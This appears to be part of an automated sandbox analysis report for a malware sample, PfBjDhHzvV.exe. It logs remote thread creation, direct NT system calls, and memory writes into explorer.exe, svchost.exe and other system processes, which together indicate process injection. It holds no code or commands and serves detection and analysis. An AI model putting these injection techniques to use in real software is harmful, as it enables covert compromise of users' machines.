            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 26F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 240000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 250000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: B20000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: B30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 790000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 7A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 22D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 22E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 330000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 340000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread created: unknown EIP: 6E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 730000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2610000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2660000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2920000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2970000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 740000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2810000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 24F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 29A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 29F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 720000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2150000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: E00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2BD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 880000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 21B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 11A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 11B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2DD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 3020000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 1370000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 13C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 14D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2560000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 2950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeThread created: unknown EIP: 7B0000Jump to behavior
Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
  NtWriteVirtualMemory: Direct from: 0x77762E3C
  NtMapViewOfSection: Direct from: 0x77762D1C
  NtCreateMutant: Direct from: 0x777635CC
  NtUnmapViewOfSection: Direct from: 0x77762D3C
  NtNotifyChangeKey: Direct from: 0x77763C2C
  NtSetValueKey: Direct from: 0x7776309C
  NtResumeThread: Direct from: 0x777636AC
  NtWriteFile: Direct from: 0x77762AFC
  NtDeviceIoControlFile: Direct from: 0x77757B2E
  NtQuerySystemInformation: Direct from: 0x77762DFC
  NtAllocateVirtualMemory: Direct from: 0x77762BFC
  NtReadFile: Direct from: 0x77762ADC
  NtEnumerateKey: Direct from: 0x77762DBC
  NtDelayExecution: Direct from: 0x77762DDC
  NtQueryInformationProcess: Direct from: 0x77762C26
  NtAllocateVirtualMemory: Direct from: 0x77763C9C
  NtSetInformationThread: Direct from: 0x77762B4C
  NtQueryAttributesFile: Direct from: 0x77762E6C
  NtClose: Direct from: 0x77762B6C
  NtAllocateVirtualMemory: Direct from: 0x77762C6C
  NtQuerySystemInformation: Direct from: 0x777648CC
  NtDeleteValueKey: Direct from: 0x777637FC
  NtSetInformationFile: Direct from: 0x77762D0C
  NtQueryVolumeInformationFile: Direct from: 0x77762F2C
  NtOpenSection: Direct from: 0x77762E0C
  NtDeviceIoControlFile: Direct from: 0x77762AEC
  NtAllocateVirtualMemory: Direct from: 0x77762BEC
  NtSetInformationThread: Direct from: 0x77762ECC
  NtQueryInformationToken: Direct from: 0x77762CAC
  NtTerminateThread: Direct from: 0x77762FCC
  NtQuerySystemInformation: Direct from: 0x765E833C
  NtQueueApcThread: Direct from: 0x77762EEC
  NtCreateFile: Direct from: 0x77762FEC
  NtOpenFile: Direct from: 0x77762DCC
  NtEnumerateValueKey: Direct from: 0x77762BAC
  NtAdjustPrivilegesToken: Direct from: 0x77762EAC
  NtAllocateVirtualMemory: Direct from: 0x77762B9C
  NtSetInformationProcess: Direct from: 0x77762C5C
  NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe
  Memory written: PID: 4056, value: E8 written at each of the following bases (15 events, in order of observation):
    1080000, 2D10000, 2D30000, 2D40000, 2D50000, 8880000, 8850000, 2F60000,
    8830000, 8860000, 8870000, 89A0000, 8B10000, 8B20000, 8B30000
Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
  Memory written: PID: 4056, value: E8 written at each of the following bases (29 events, in order of observation):
    B8C0000, B8D0000, B8E0000, B8F0000, B900000, B030000, B910000, B920000,
    E1D0000, E1E0000, E1F0000, E200000, E230000, E330000, E210000, E220000,
    E340000, E350000, E360000, E400000, E410000, E420000, E430000, E450000,
    E460000, E470000, E480000, E490000, E4A0000
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe
  Memory written: C:\Windows\System32\fontdrvhost.exe base: 9D0000
  Memory written: C:\Windows\System32\fontdrvhost.exe base: AD0000
  Memory written: C:\Windows\System32\dwm.exe base: 10000
  Memory written: C:\Windows\System32\sihost.exe base: 3B0000
  Memory written: C:\Windows\System32\svchost.exe base: 10000
  Memory written: C:\Windows\System32\svchost.exe base: 980000
  Memory written: C:\Windows\System32\ctfmon.exe base: AB0000
  Memory written: C:\Windows\explorer.exe base: 1080000
  Memory written: C:\Windows\System32\svchost.exe base: BD0000
  Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CA0000
  Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C0000
  Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: ED0000
  Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000
  Memory written: C:\Windows\System32\RuntimeBroker.exe base: 950000
  Memory written: C:\Windows\System32\smartscreen.exe base: 70000
  Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 10000
  Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 120000
  Memory written: C:\Windows\System32\RuntimeBroker.exe base: C40000
  Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 290000
  Memory written: C:\Windows\System32\conhost.exe base: 580000
  Memory written: C:\Windows\System32\backgroundTaskHost.exe base: C80000
  Memory written: C:\Windows\System32\RuntimeBroker.exe base: DB0000
  Memory written: C:\Windows\System32\svchost.exe base: A80000
  Memory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe, at each of the following bases (30 events, in order of observation):
    2410000, 2460000, 2290000, 22A0000, 950000, 960000, BF0000, C00000,
    340000, 350000, 1490000, 2E70000, 2470000, 25C0000, F60000, F70000,
    21D0000, 2320000, 2930000, 2980000, 840000, 890000, 2460000, 24B0000,
    2260000, 22B0000, F20000, F70000, 2390000, 23E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1280000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2EB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2450000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 860000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2420000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2620000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1170000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2700000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 760000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2210000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 240000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 730000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2610000Jump to behavior
